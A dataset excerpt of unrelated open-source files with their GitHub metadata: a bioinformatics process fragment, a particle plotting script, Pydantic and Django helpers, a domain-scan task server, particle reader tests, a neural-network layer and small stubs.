return_code, _, _ = Cmd["create_gene_sets.py"][gene_set_args] & TEE(
retcode=None
)
if return_code:
self.error("Error while creating gene sets.")
for gene_file in sorted(Path(out_dir).glob("*.tab.gz")):
gene_file.rename(Path() / gene_file.name)
process_inputs = {
"src": str(gene_file.name),
"source": cuffquants[0].output.source,
"species": cuffquants[0].output.species,
}
self.run_process("upload-geneset", process_inputs)
|
{
"content_hash": "a8844a62ba30e19f5cc9a85da037274c",
"timestamp": "",
"source": "github",
"line_count": 353,
"max_line_length": 99,
"avg_line_length": 37.756373937677054,
"alnum_prop": 0.5481692677070829,
"repo_name": "genialis/resolwe-bio",
"id": "617b303379ff1e13970bd36f0854c2b0186b9a03",
"size": "13328",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "resolwe_bio/processes/differential_expression/cuffdiff.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "10553"
},
{
"name": "PLpgSQL",
"bytes": "4491"
},
{
"name": "Python",
"bytes": "1729619"
},
{
"name": "R",
"bytes": "20619"
},
{
"name": "Shell",
"bytes": "6713"
}
],
"symlink_target": ""
}
|
import sys
import os
import re
import scipy.stats as stats
from matplotlib.pyplot import *
from numpy import *
# Goal: follow the jitter of some nodes (ideal case, massive join/departure, presence of colluders)
print "Usage: ./7_log_size.py dir"
def roundId_jitteredList(dir):
''' Compute the jitter of nodes between nodeIdMin and nodeIdMax per round
Return a list of the roundId, and the associated average jitter of considered nodes. '''
roundList = []
logSizeList = [] # Contains the proportion of jittered node per round
totalSizeList = []
nb_nodes = 0
for filename in os.listdir(dir):
if re.search("logSize", filename) == None:
continue
f = open(dir+"/"+filename, "r")
nb_nodes += 1
roundId = 1
for line in f:
line = map(int, line.split('\t'))
logSize = line[0]
totalSize = line[1]
if not roundList.__contains__(roundId):
roundList.append(roundId)
roundList.sort()
logSizeList.insert(roundList.index(roundId), logSize/1000000.0)
totalSizeList.insert(roundList.index(roundId), totalSize/1000000.0)
else:
logSizeList[roundList.index(roundId)] += logSize/1000000.0
totalSizeList[roundList.index(roundId)] += totalSize/1000000.0
roundId += 1
f.close()
#for i in range(len(jitteredRoundsList)):
#jitteredRoundsList[i] = (jitteredRoundsList[i] * 100) / nb_nodes
return (roundList, logSizeList, totalSizeList)
(x, y, z) = roundId_jitteredList(sys.argv[1])
p1 = plot(x, y, 'k', linewidth=2, label="Log size") # k for black
p2 = plot(x, z, 'k:', linewidth=2, label="Total size") # k for black
#vlines(300, 0, 2000, color='k', linestyles='dashed')
#plt.xticks(tf)
#xt = linspace(1, len(jitteredRoundsList), 4)
#xticks(xt)
#title('my plot')
tick_params(axis='both', which='major', labelsize=18)
ylabel('Memory in Mb', fontsize=18)
xlabel('Time in seconds', fontsize=18)
legend(loc="lower right", prop={'size':18})
#ylim(ymax=100, ymin=0)
#xlim(xmax=600, xmin=0)
show()
#savefig('percentageJitteredRounds.pdf')
#os.system("pdfcrop percentageNonJitteredRounds.pdf percentageNonJitteredRounds.pdf")
|
{
"content_hash": "45aa922db928384579e65a46dc01ad96",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 99,
"avg_line_length": 30.527027027027028,
"alnum_prop": 0.6489597166888004,
"repo_name": "jdecouchant/PAG",
"id": "a9b963b1afb4c50023b3b7c7a876648f7e11b983",
"size": "2277",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Java/javaCode/scripts/7_log_size.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "3355"
},
{
"name": "C++",
"bytes": "711450"
},
{
"name": "D",
"bytes": "17931"
},
{
"name": "FreeMarker",
"bytes": "2626"
},
{
"name": "Groff",
"bytes": "1325577"
},
{
"name": "Java",
"bytes": "151786"
},
{
"name": "Makefile",
"bytes": "246918"
},
{
"name": "Python",
"bytes": "24963"
},
{
"name": "Shell",
"bytes": "3173753"
}
],
"symlink_target": ""
}
|
from typing import Container, Dict, Type
from pydantic import BaseModel, create_model
from sqlalchemy.inspection import inspect
from sqlalchemy.orm.properties import ColumnProperty
def sqlalchemy_to_pydantic(
db_model: Type, *, include: Dict[str, type] = None, exclude: Container[str] = None
) -> Type[BaseModel]:
"""
Mostly copied from https://github.com/tiangolo/pydantic-sqlalchemy
"""
if exclude is None:
exclude = []
mapper = inspect(db_model)
fields = {}
for attr in mapper.attrs:
if isinstance(attr, ColumnProperty):
if attr.columns:
column = attr.columns[0]
python_type = column.type.python_type
name = attr.key
if name in exclude:
continue
default = None
if column.default is None and not column.nullable:
default = ...
fields[name] = (python_type, default)
if bool(include):
for name, python_type in include.items():
default = None
fields[name] = (python_type, default)
pydantic_model = create_model(
db_model.__name__, **fields # type: ignore
)
return pydantic_model
|
{
"content_hash": "8b0816bd651d4384a67bb3b0dce2f96d",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 86,
"avg_line_length": 33.78378378378378,
"alnum_prop": 0.5872,
"repo_name": "isislab/CTFd",
"id": "cd3ed4f6f19656dc2865b3c2638b3e200f510da2",
"size": "1250",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "CTFd/api/v1/helpers/schemas.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13062"
},
{
"name": "HTML",
"bytes": "156198"
},
{
"name": "JavaScript",
"bytes": "38944"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "146388"
},
{
"name": "Shell",
"bytes": "611"
}
],
"symlink_target": ""
}
|
from django import template
from django.conf import settings
from GChartWrapper import Sparkline
from camo import CamoClient
from ...comments.models import Comment
register = template.Library()
@register.simple_tag
def graph(professor):
scores = []
comments = Comment.objects.filter(
professor=professor, responsibility__gt=0)
for c in comments:
scores.append(float(c.responsibility+c.personality +
c.workload+c.difficulty)*5)
if len(scores) == 0:
scores.append(0)
if len(scores) == 1:
scores.append(scores[0])
chart = Sparkline(scores, encoding='text')
chart.color('0077CC')
chart.size(450, 262)
chart.marker('B', 'E6F2FA', 0, 0, 0)
chart.line(1, 0, 0)
chart.axes('y')
if not settings.DEBUG:
client = CamoClient(settings.CAMO_URL, key=settings.CAMO_KEY)
url = client.image_url(chart.url)
else:
url = chart.url
return url
|
{
"content_hash": "86a5e8373d334de5b4c9057bf7ce98eb",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 69,
"avg_line_length": 24.3,
"alnum_prop": 0.6399176954732511,
"repo_name": "Jpadilla1/notaso",
"id": "79340cd1078653969c4e71b7a6f67fc3cd0cd4b5",
"size": "972",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "notaso/professors/templatetags/graph_creation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "16583"
},
{
"name": "HTML",
"bytes": "118520"
},
{
"name": "JavaScript",
"bytes": "4052"
},
{
"name": "Python",
"bytes": "80984"
}
],
"symlink_target": ""
}
|
"""
The QueuedDomainRequestServer handles incoming scan_task requests.
"""
"""
################################################################################
Messages:
DomainSearchScanner -> QueuedDomainRequestServer:
"request": "task"
QueuedDomainRequestServer -> DomainSearchScanner: scan request
"response": {
"task": {
"domain": "example.com",
"request_id": 1
}
}
QueuedDomainRequestServer -> DomainSearchScanner: shutdown triggered
"response": {
"msg": "shutdown"
}
################################################################################
Queue structur:
queued_domain_request_queue = (request_id, domain)
request_id = int
domain = str
################################################################################
"""
import time
import json
import queue
import socketserver
from additional import Config
from additional.Logging import Logging
################################################################################
class BasicThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class QueuedDomainRequestServer(BasicThreadedTCPServer):
# if the server stops/starts quickly, don't fail because of "port in use"
allow_reuse_address = True
def __init__(self, addr, handler, arguments):
self.scanners = arguments[0]
self.scanners_lock = arguments[1]
self.running_event = arguments[2]
self.queued_domain_request_queue = arguments[3]
self.log = Logging(self.__class__.__name__).get_logger()
BasicThreadedTCPServer.__init__(self, addr, handler)
################################################################################
class QueuedDomainRequestHandler(socketserver.BaseRequestHandler):
"""
This class tries to get a new entry from queued_domain_request queue as long
as the server is in running state.
"""
def _add_scanner(self):
"""
Method to add a scanner to the list of connected scanners.
"""
with self.server.scanners_lock:
self.server.scanners[self.client_address[1]] = (
self.client_address[0], time.strftime("%d.%m.%Y %H:%M:%S"))
def _remove_scanner(self):
"""
Method to remove a scanner from the list of connected scanners.
"""
with self.server.scanners_lock:
self.server.scanners.pop(self.client_address[1])
############################################################################
def handle(self):
"""
Method to handle the request.
"""
# adds scanner to the list of connected scanners
self._add_scanner()
last_request = None
while self.server.running_event.is_set():
try:
data = self.request.recv(1024).decode('UTF-8').strip()
# detects disconnected scanner
if not data:
raise ConnectionAbortedError
message = json.loads(data)
# validates message
if 'request' not in message and message['request'] != 'task':
raise ValueError
except ValueError:
self.server.log.error('Invalid message: {}'.format(data))
break
except (ConnectionAbortedError, ConnectionResetError,
ConnectionRefusedError):
# adds the last task back to the queue if not None
if last_request:
self.server.queued_domain_request_queue.put(last_request)
self.server.log.info('Connection aborted: {}:{}'
.format(self.client_address[0], self.client_address[1]))
break
####################################################################
self.server.log.info('Received queued-domain request')
####################################################################
while 1:
# checks if server wants to shut down
if not self.server.running_event.is_set():
# informs the scanner of an upcoming server shutdown
self.request.sendall(bytes(json.dumps({
'response': {
'msg': 'shutdown'
}
}), 'UTF-8'))
break
try:
# tries to get a request from queued-domain-request queue
request = self.server.queued_domain_request_queue.get(
timeout=Config.queued_domain_request_server_timeout)
request_id = request[0]
domain = request[1]
# sends the received domain to the scanner
self.request.sendall(bytes(json.dumps({
'response': {
'task': {
'domain': domain,
'request_id': request_id
}
}
}), 'UTF-8'))
# saves the last request to add it back to the queue if
# meanwhile the scanner has disconnected
last_request = request
self.server.queued_domain_request_queue.task_done()
break
except queue.Empty:
pass
self._remove_scanner()
|
{
"content_hash": "f2e7415520d85ce3f80e6385483f0535",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 82,
"avg_line_length": 29.390625,
"alnum_prop": 0.4733297891192628,
"repo_name": "andreas-kowasch/DomainSearch",
"id": "72074dba31cd6f67a8515f22393c88ea1c674811",
"size": "5668",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "DomainSearchServer/additional/QueuedDomainRequestServer.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "332852"
},
{
"name": "Shell",
"bytes": "1135"
}
],
"symlink_target": ""
}
|
import random
def random_data(points=50, maximum=100):
return [random.random() * maximum for a in xrange(points)]
def random_colour(min=20, max=200):
func = lambda: int(random.random() * (max-min) + min)
r, g, b = func(), func(), func()
return '%02X%02X%02X' % (r, g, b)
|
{
"content_hash": "291f0f8c0ab044106b469ec9ec55b988",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 62,
"avg_line_length": 29,
"alnum_prop": 0.6172413793103448,
"repo_name": "gregdingle/genetify",
"id": "2bedf6e49e22d95f4772405ac275936518f16aea",
"size": "290",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pygooglechart/examples/helper.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "94586"
},
{
"name": "PHP",
"bytes": "100321"
},
{
"name": "Python",
"bytes": "43424"
},
{
"name": "R",
"bytes": "14111"
},
{
"name": "Shell",
"bytes": "497"
}
],
"symlink_target": ""
}
|
from __future__ import with_statement
import unittest
import sys
import os
import IECore
import IECoreScene
class TestPDCReader( unittest.TestCase ) :
def testConstruction( self ) :
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
self.assert_( r.isInstanceOf( "ParticleReader" ) )
self.assertEqual( type( r ), IECoreScene.PDCParticleReader )
self.assertEqual( r["fileName"].getValue().value, "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
def testReadWithPrimVarConversion( self ) :
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
r.parameters()["realType"].setValue( "native" )
self.assertEqual( type( r ), IECoreScene.PDCParticleReader )
self.assertTrue( r.parameters()["convertPrimVarNames"].getTypedValue() )
self.assertEqual( r.numParticles(), 25 )
attrNames = r.attributeNames()
expectedAttrNamesAndTypes = {
"particleId" : IECore.DoubleVectorData,
"mass" : IECore.DoubleVectorData,
"lastWorldVelocity" : IECore.V3dVectorData,
"worldVelocityInObjectSpace" : IECore.V3dVectorData,
"worldVelocity" : IECore.V3dVectorData,
"lastWorldPosition" : IECore.V3dVectorData,
"worldPosition" : IECore.V3dVectorData,
"acceleration" : IECore.V3dVectorData,
"lastVelocity" : IECore.V3dVectorData,
"velocity" : IECore.V3dVectorData,
"lastPosition" : IECore.V3dVectorData,
"position" : IECore.V3dVectorData,
"lifespanPP" : IECore.DoubleVectorData,
"finalLifespanPP" : IECore.DoubleVectorData,
"emitterId" : IECore.DoubleVectorData,
"birthTime" : IECore.DoubleVectorData,
"age" : IECore.DoubleVectorData,
}
self.assertEqual( len( attrNames ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in attrNames )
expectedConvertedAttrNamesAndTypes = {
"particleId" : IECore.DoubleVectorData,
"mass" : IECore.DoubleVectorData,
"lastWorldVelocity" : IECore.V3dVectorData,
"worldVelocityInObjectSpace" : IECore.V3dVectorData,
"worldVelocity" : IECore.V3dVectorData,
"lastWorldPosition" : IECore.V3dVectorData,
"worldPosition" : IECore.V3dVectorData,
"acceleration" : IECore.V3dVectorData,
"lastVelocity" : IECore.V3dVectorData,
"velocity" : IECore.V3dVectorData,
"lastPosition" : IECore.V3dVectorData,
"P" : IECore.V3dVectorData,
"lifespanPP" : IECore.DoubleVectorData,
"finalLifespanPP" : IECore.DoubleVectorData,
"emitterId" : IECore.DoubleVectorData,
"birthTime" : IECore.DoubleVectorData,
"age" : IECore.DoubleVectorData,
}
c = r.read()
self.assertEqual( type( c ), IECoreScene.PointsPrimitive )
self.assertEqual( len( c ), len( expectedConvertedAttrNamesAndTypes ) )
for i in expectedConvertedAttrNamesAndTypes.keys() :
self.assert_( i in c )
self.assertEqual( type(c[i].data), expectedConvertedAttrNamesAndTypes[i] )
self.assertEqual( len(c[i].data), r.numParticles() )
for p in c["P"].data :
self.assertEqual( p.y, 0 )
self.assert_( abs( p.x ) < 1.1 )
self.assert_( abs( p.z ) < 1.1 )
self.assertEqual( c["particleId"].data, IECore.DoubleVectorData( range( 0, 25 ) ) )
def testReadNoPrimVarConversion( self ) :
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
self.assertEqual( type( r ), IECoreScene.PDCParticleReader )
r["realType"].setValue( "native" )
r["convertPrimVarNames"].setValue( IECore.BoolData( False ) )
self.assertFalse( r.parameters()["convertPrimVarNames"].getTypedValue() )
self.assertEqual( r.numParticles(), 25 )
attrNames = r.attributeNames()
expectedAttrNamesAndTypes = {
"particleId" : IECore.DoubleVectorData,
"mass" : IECore.DoubleVectorData,
"lastWorldVelocity" : IECore.V3dVectorData,
"worldVelocityInObjectSpace" : IECore.V3dVectorData,
"worldVelocity" : IECore.V3dVectorData,
"lastWorldPosition" : IECore.V3dVectorData,
"worldPosition" : IECore.V3dVectorData,
"acceleration" : IECore.V3dVectorData,
"lastVelocity" : IECore.V3dVectorData,
"velocity" : IECore.V3dVectorData,
"lastPosition" : IECore.V3dVectorData,
"position" : IECore.V3dVectorData,
"lifespanPP" : IECore.DoubleVectorData,
"finalLifespanPP" : IECore.DoubleVectorData,
"emitterId" : IECore.DoubleVectorData,
"birthTime" : IECore.DoubleVectorData,
"age" : IECore.DoubleVectorData,
}
self.assertEqual( len( attrNames ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in attrNames )
c = r.read()
self.assertEqual( type( c ), IECoreScene.PointsPrimitive )
self.assertEqual( len( c ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in c )
self.assertEqual( type(c[i].data), expectedAttrNamesAndTypes[i] )
self.assertEqual( len(c[i].data), r.numParticles() )
for p in c["position"].data :
self.assertEqual( p.y, 0 )
self.assert_( abs( p.x ) < 1.1 )
self.assert_( abs( p.z ) < 1.1 )
self.assertEqual( c["particleId"].data, IECore.DoubleVectorData( range( 0, 25 ) ) )
def testFiltering( self ) :
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
attributesToLoad = [ "position", "age" ]
r.parameters()["percentage"].setValue( IECore.FloatData( 50 ) )
r.parameters()["attributes"].setValue( IECore.StringVectorData( attributesToLoad ) )
a = r.readAttribute( "position" )
# what the acceptable thresholds should be are somewhat debatable,
# especially for such a small number of particles
self.assert_( len( a ) < 13 )
self.assert_( len( a ) > 7 )
p = r.read()
self.assert_( p.numPoints < 13 )
self.assert_( p.numPoints > 7 )
convertedAttributesToLoad = [ "P", "age" ]
for attr in convertedAttributesToLoad :
self.assertEqual( p.numPoints, p[attr].data.size() )
# compare filtering with int ids
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.intId.250.pdc" )
attributesToLoad = [ "position", "age" ]
r.parameters()["percentage"].setValue( IECore.FloatData( 50 ) )
r.parameters()["attributes"].setValue( IECore.StringVectorData( attributesToLoad ) )
a2 = r.readAttribute( "position" )
self.assertEqual( a, a2 )
# compare filtering with no ids at all
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.noId.250.pdc" )
attributesToLoad = [ "position", "age" ]
r.parameters()["percentage"].setValue( IECore.FloatData( 50 ) )
r.parameters()["attributes"].setValue( IECore.StringVectorData( attributesToLoad ) )
a3 = r.readAttribute( "position" )
self.assertNotEqual( a3, a )
# what the acceptable thresholds should be are somewhat debatable,
# especially for such a small number of particles
self.assert_( len( a ) < 15 )
self.assert_( len( a ) > 8 )
def testConversion( self ) :
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
self.assertEqual( type( r ), IECoreScene.PDCParticleReader )
r.parameters()["realType"].setValue( "float" )
expectedAttrNamesAndTypes = {
"particleId" : IECore.FloatVectorData,
"mass" : IECore.FloatVectorData,
"lastWorldVelocity" : IECore.V3fVectorData,
"worldVelocityInObjectSpace" : IECore.V3fVectorData,
"worldVelocity" : IECore.V3fVectorData,
"lastWorldPosition" : IECore.V3fVectorData,
"worldPosition" : IECore.V3fVectorData,
"acceleration" : IECore.V3fVectorData,
"lastVelocity" : IECore.V3fVectorData,
"velocity" : IECore.V3fVectorData,
"lastPosition" : IECore.V3fVectorData,
"P" : IECore.V3fVectorData,
"lifespanPP" : IECore.FloatVectorData,
"finalLifespanPP" : IECore.FloatVectorData,
"emitterId" : IECore.FloatVectorData,
"birthTime" : IECore.FloatVectorData,
"age" : IECore.FloatVectorData,
}
c = r.read()
self.assertEqual( type( c ), IECoreScene.PointsPrimitive )
self.assertEqual( len( c ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in c )
self.assertEqual( type(c[i].data), expectedAttrNamesAndTypes[i] )
self.assertEqual( len(c[i].data), r.numParticles() )
for p in c["P"].data :
self.assertEqual( p.y, 0 )
self.assert_( abs( p.x ) < 1.1 )
self.assert_( abs( p.z ) < 1.1 )
def testFileNameChange( self ) :
"""Now Readers are Ops, the filename can be changed and read() can be called
again. So we need to check that that works."""
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
self.assertEqual( type( r ), IECoreScene.PDCParticleReader )
r.parameters()["realType"].setValue( "float" )
expectedAttrNamesAndTypes = {
"particleId" : IECore.FloatVectorData,
"mass" : IECore.FloatVectorData,
"lastWorldVelocity" : IECore.V3fVectorData,
"worldVelocityInObjectSpace" : IECore.V3fVectorData,
"worldVelocity" : IECore.V3fVectorData,
"lastWorldPosition" : IECore.V3fVectorData,
"worldPosition" : IECore.V3fVectorData,
"acceleration" : IECore.V3fVectorData,
"lastVelocity" : IECore.V3fVectorData,
"velocity" : IECore.V3fVectorData,
"lastPosition" : IECore.V3fVectorData,
"P" : IECore.V3fVectorData,
"lifespanPP" : IECore.FloatVectorData,
"finalLifespanPP" : IECore.FloatVectorData,
"emitterId" : IECore.FloatVectorData,
"birthTime" : IECore.FloatVectorData,
"age" : IECore.FloatVectorData,
}
c = r.read()
self.assertEqual( type( c ), IECoreScene.PointsPrimitive )
self.assertEqual( len( c ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in c )
self.assertEqual( type(c[i].data), expectedAttrNamesAndTypes[i] )
self.assertEqual( len(c[i].data), r.numParticles() )
for p in c["P"].data :
self.assertEqual( p.y, 0 )
self.assert_( abs( p.x ) < 1.1 )
self.assert_( abs( p.z ) < 1.1 )
r["fileName"].setValue( IECore.StringData( "test/IECore/data/pdcFiles/10Particles.pdc" ) )
self.assertEqual( r.numParticles(), 10 )
c = r.read()
self.assertEqual( type( c ), IECoreScene.PointsPrimitive )
self.assertEqual( len( c ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in c )
self.assertEqual( type(c[i].data), expectedAttrNamesAndTypes[i] )
self.assertEqual( len(c[i].data), 10 )
for p in c["P"].data :
self.assertEqual( p.y, 0 )
self.assert_( abs( p.x ) < 1.1 )
self.assert_( abs( p.z ) < 1.1 )
def testParameterTypes( self ) :
p = IECoreScene.PDCParticleReader()
self.assert_( p.resultParameter().isInstanceOf( "ObjectParameter" ) )
self.assertEqual( p.resultParameter().validTypes(), [ IECoreScene.TypeId.PointsPrimitive ] )
def testWarnings( self ) :
p = IECoreScene.PointsPrimitive( 3 )
p["d"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.DoubleVectorData( [ 1, 2, 3 ] ) )
IECore.Writer.create( p, "test/particleShape1.250.pdc" ).write()
r = IECoreScene.PDCParticleReader( "test/particleShape1.250.pdc" )
c = IECore.CapturingMessageHandler()
with c :
r.read()
self.assertEqual( len( c.messages ), 0 )
r["percentage"].setTypedValue( 10 )
with c :
r.read()
self.assertEqual( len( c.messages ), 1 )
self.assertEqual( c.messages[0].level, IECore.Msg.Level.Warning )
def tearDown( self ) :
if os.path.isfile( "test/particleShape1.250.pdc" ) :
os.remove( "test/particleShape1.250.pdc" )
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "a60f03801301b6800508b70a5b568c26",
"timestamp": "",
"source": "github",
"line_count": 314,
"max_line_length": 134,
"avg_line_length": 36.44904458598726,
"alnum_prop": 0.7075578855395369,
"repo_name": "appleseedhq/cortex",
"id": "5682199b30e07d786461288db05a8e0ce3a5c5db",
"size": "13234",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/IECoreScene/PDCReader.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1374"
},
{
"name": "C",
"bytes": "66503"
},
{
"name": "C++",
"bytes": "9536541"
},
{
"name": "CMake",
"bytes": "95418"
},
{
"name": "GLSL",
"bytes": "24422"
},
{
"name": "Mathematica",
"bytes": "255937"
},
{
"name": "Objective-C",
"bytes": "2360"
},
{
"name": "Python",
"bytes": "4651272"
},
{
"name": "Tcl",
"bytes": "1796"
}
],
"symlink_target": ""
}
|
from .Module import Module
from beacon8.init import const, xavier
from beacon8.utils import create_param_and_grad
import numpy as _np
import theano as _th
class Linear(Module):
def __init__(self, nin, nout, with_bias=True, initW=xavier(), initB=const(0)):
Module.__init__(self)
self.nin = nin
self.nout = nout
self.with_bias = with_bias
self.weight, self.grad_weight = create_param_and_grad((nin, nout), initW, fan=(nin, nout), name='Wlin_{}x{}'.format(nin, nout))
if self.with_bias:
self.bias, self.grad_bias = create_param_and_grad(nout, initB, name='blin_{}'.format(nout))
def symb_forward(self, symb_input):
out = _th.tensor.dot(symb_input, self.weight)
if self.with_bias:
out += self.bias
return out
|
{
"content_hash": "7fded291a862fa23a6d004648356415b",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 135,
"avg_line_length": 28.24137931034483,
"alnum_prop": 0.6214896214896215,
"repo_name": "VisualComputingInstitute/Beacon8",
"id": "7743a8c343e0093759cdcf1f4c4067ec39f87061",
"size": "819",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "beacon8/layers/Linear.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21951"
}
],
"symlink_target": ""
}
|
from msrest.paging import Paged
class UserPaged(Paged):
"""
A paging container for iterating over a list of User object
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[User]'}
}
def __init__(self, *args, **kwargs):
super(UserPaged, self).__init__(*args, **kwargs)
|
{
"content_hash": "692cb5cd9c47dabf8516eb67589b84a1",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 63,
"avg_line_length": 24,
"alnum_prop": 0.5546875,
"repo_name": "SUSE/azure-sdk-for-python",
"id": "e14d6e48f7109bb921cfe6fee46885e590f66833",
"size": "858",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/models/user_paged.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9090161"
}
],
"symlink_target": ""
}
|
import frappe
from frappe.model.document import Document
class NoteSeenBy(Document):
pass
|
{
"content_hash": "d3819c77d6726fd876ca04305b508878",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 42,
"avg_line_length": 18.4,
"alnum_prop": 0.8260869565217391,
"repo_name": "almeidapaulopt/frappe",
"id": "01bee05a9fee8a0ce6a005777ade237b37b68e90",
"size": "204",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "frappe/desk/doctype/note_seen_by/note_seen_by.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "67734"
},
{
"name": "HTML",
"bytes": "245760"
},
{
"name": "JavaScript",
"bytes": "2345089"
},
{
"name": "Less",
"bytes": "25489"
},
{
"name": "Makefile",
"bytes": "99"
},
{
"name": "Python",
"bytes": "3436599"
},
{
"name": "SCSS",
"bytes": "248606"
},
{
"name": "Shell",
"bytes": "3505"
},
{
"name": "Vue",
"bytes": "96912"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.